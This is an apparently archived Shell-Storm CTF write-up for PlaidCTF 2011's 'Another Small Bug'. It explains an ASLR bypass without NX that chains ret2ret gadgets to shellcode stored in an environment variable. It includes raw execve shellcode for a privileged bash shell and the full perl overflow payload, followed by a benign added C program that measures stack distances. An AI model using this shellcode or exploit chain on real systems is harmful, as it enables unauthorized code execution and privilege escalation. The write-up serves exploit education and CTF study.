[ Research.Shell-Storm.org ] | Easy way to bypass randomization by chaining ret2ret and ENVAR (without NX)
Title: Easy way to bypass randomization by chaining ret2ret and ENVAR (without NX)
Language: English
Author: Florian Gaultier (agix)
Date: 2011-04-28

 

Randomization makes buffer overflow exploitation harder because we can't guess our shellcode address: it changes with every execution. A well-known technique consists in brute forcing an address and praying to land in a really big NOP sled (maybe 60K) that redirects execution into our dear shellcode :) As an example, we take Another Small Bug from PlaidCTF 2k11 (an impressive CTF, I want to insist :D ! It was really fun). You can check the brute forcing method here: http://howto.shell-storm.org/files/howto-9.php But let's try to exploit it without brute forcing. I skip the way to find the vuln, Jonathan explains it very well, so I start off where he overflows the SEIP:

Now, I will write my shellcode, without NOPs, in an environment variable (I choose this execve('/bin/bash',['/bin/bash','-p'],0): http://www.shell-storm.org/shellcode/files/shellcode-606.php):

    export hack=$(perl -e 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"')

Notice the variable name, it's important. So, when the program segfaults, I check the stack:

The addresses I framed lead to the environment variables; I have to find where my hack variable is: 0xbf952aa1, that's right. Now let's look again when I re-execute the same payload:

For each execution, my hack address is at the same place! Just count how many words there are between $esp and my hack address: 31, plus 0x65646362 where the first ret returns. Now I just have to ret to my main's ret 32 times. It will unstack until the 'hack' address, but it will also overwrite the 'hack' address with the \x00 end of string! Don't worry, just put a pop/ret address before it. I found one in the puts function. So my payload will be:

    perl -e 'print "a"x532 . "\x2f\x82\x04\x08"x30 . "\xf9\x88\x04\x08"' | ./exploitme 999999

As Jonathan said, "I had trouble opening a simple shell..." The same thing happened to me.
Just try another shellcode for the POC, execve('/usr/bin/id',0,0):

    export hack=$(perl -e 'print "\x6a\x0b\x58\xeb\x07\x5b\x31\xc9\x31\xd2\xcd\x80\xe8\xf4\xff\xff\xff/usr/bin/id"')

The payload won't change. No brute force, it's easy! Do you remember what I said about taking care with the name of the environment variable, 'hack'? As you can see, 'hack=' is ASM for push 0x3d6b6361, so there is no bug with 'hack'! You can use any name as long as <name>= is a neutral ASM instruction! Last thing: the number of rets can differ by 1 between gdb and 'reality'. It depends on where your envvar address is in the stack, because gdb has its own environment variables. So stop maltreating memory with brute forcing and infinite NOP sleds! You can continue to jump into your shellcode softly :D
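To check the claim above that the pointer to the hack variable sits a fixed number of words above $esp even though ASLR moves the absolute addresses, here is a small C program that is not from the article: it measures the word distance from its own frame to the envp slot holding the pointer to a given variable (the function names words_to_env_slot and words_to_first_env_slot are mine). A word is 4 bytes on the 32-bit target of the article and 8 bytes on a 64-bit build.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

extern char **environ;   /* set by the C runtime to the envp array at process start */

/* Number of machine words between a local in this frame (a stand-in for
 * the stack pointer at the moment of the overflow) and the envp slot that
 * points at "NAME=...". The slot, not the string, is what the article's
 * chain of rets unstacks down to. Valid only while environ still points
 * at the initial array on the stack (i.e. before any setenv/putenv).
 * Returns 0 if NAME is not in the environment. */
long words_to_env_slot(const char *name)
{
    volatile char marker = 0;             /* forces a real stack slot */
    size_t n = strlen(name);
    for (char **slot = environ; slot != NULL && *slot != NULL; slot++) {
        if (strncmp(*slot, name, n) == 0 && (*slot)[n] == '=')
            return ((intptr_t)slot - (intptr_t)&marker) / (long)sizeof(void *);
    }
    return 0;
}

/* Same measurement for envp[0], so it works with any environment. */
long words_to_first_env_slot(void)
{
    volatile char marker = 0;
    if (environ == NULL || environ[0] == NULL)
        return 0;
    return ((intptr_t)environ - (intptr_t)&marker) / (long)sizeof(void *);
}

int main(void)
{
    /* Run this several times: under ASLR the absolute addresses move on
     * every run while the word counts stay the same, which is why ASLR on
     * its own does not stop the technique and the article needs a stack
     * without NX. Run it again with one extra variable exported (or under
     * gdb, which adds its own variables) and the counts shift, which is
     * the difference of 1 between gdb and 'reality' the article ends on. */
    printf("envp array at %p, %ld words above this frame\n",
           (void *)environ, words_to_first_env_slot());
    printf("envp slot for PATH is %ld words above this frame (0 = unset)\n",
           words_to_env_slot("PATH"));
    return 0;
}
```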

  [ @JonathanSalwan ] Shell-Storm Network - 2008-2012